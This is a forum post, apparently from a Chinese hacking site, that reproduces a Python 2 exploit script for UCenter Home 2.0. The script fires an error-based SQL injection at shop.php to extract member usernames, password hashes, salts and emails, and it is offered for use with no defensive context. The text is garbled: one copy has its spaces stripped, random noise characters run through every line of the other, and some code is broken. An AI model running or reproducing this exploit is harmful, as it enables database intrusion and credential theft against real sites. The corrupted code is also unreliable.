#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl4 V5 p5 O' t8 S3 K: ~" S
: r4 N0 d$ W! X* |% K7 j2 C/ H4 K' Q9 [- v. r! Q5 Y; B
#!/usr/bin/env python
8 a' `( X9 I1 j4 m7 O% O" ]; u # V; ~- V8 m( |, T* N9 `
import sys - C, g$ @4 B4 O8 l
import urllib2
$ z& [8 f( t2 y. d% pimport re 6 @8 E0 F# i8 l4 c% p, o
, b l) k! a |+ ]! [4 F) cdef info(): & [& d8 Z5 `7 w
print 'From:http://www.exploit-db.com/exploits/14997/' 8 \# M* L+ z! `" d0 a
print 'http://www.hake.cc/Web_loudong/' 4 N2 T! l5 g: [1 O5 ~% ?1 p
print 'changed:qiaoy' 6 t$ {+ X' S6 N: L5 f
print 'exp:' * Z2 w+ [1 G, E( p! [
print ' ./UCenter_Home_2.0.py site'
* y' d- |& m; }/ R2 R) E! A" y5 w ) F) e7 G7 A+ a& y7 [4 n
def main():
$ O! [! k3 R' c3 M% ?3 v0 ?. L3 f O if len(sys.argv) != 2: : ]) } v g1 [: O/ g; `
info() 3 _2 M' Y$ a- p8 W
else: $ q s8 }" u( d0 ]( n' f( V7 K) \5 \
site = sys.argv[1] ) e3 Y/ H' T- N* |) n3 h! u
if site[0:7] == 'http://': * I3 X4 I1 m) d4 H& S( F6 g
sitesite =site
7 I1 P0 ]3 n9 U# U5 \/ ^ elif site[0:8] == 'https://':
7 p" @7 |, F# Z+ v7 u! }, I sitesite = site
: M& `- N4 D5 e' R+ v+ G else:
! z; D* Y1 x. `6 W0 j2 F0 E0 a( J9 M site = 'http://'+site 5 T( a L3 h; P6 a3 `: p5 r, B
try: 4 @% j7 R( Y0 n2 _1 D" _
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' ! Y6 K4 ]. h- }- W8 {" W6 `( V
Value = urllib2.urlopen(url).read() * ^4 G0 N4 S7 N3 E4 R' t
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] " I' P. K1 h( s8 p# C2 X
hacked = Msg.split(':') % j) C1 c/ s8 D9 X' R% P1 d3 J, ] M
print 'Name: '+hacked[1]
# l5 y% G5 E: K: |0 z+ @ print 'Passwd: '+hacked[2]
3 s. _ j- j y0 d! Z! Q1 ^3 R# }! z print 'salt: '+hacked[3]
0 M& u; S& y. r6 q$ q# u print 'email: '+hacked[4] 6 s5 A2 t) T) i
except: 4 ?& J% e) a% @. g
print 'Sorry,I can\'t work............'
) R6 N' K+ Y' y/ Q9 q6 w5 B! H0 H
9 P7 a4 S* ?+ w1 n H, ~: {% l, Uif __name__ == '__main__':
0 r7 H# o" C+ d& ^; t4 E% X main() |
发表于 2013-1-23 09:18:17
收藏
支持
反对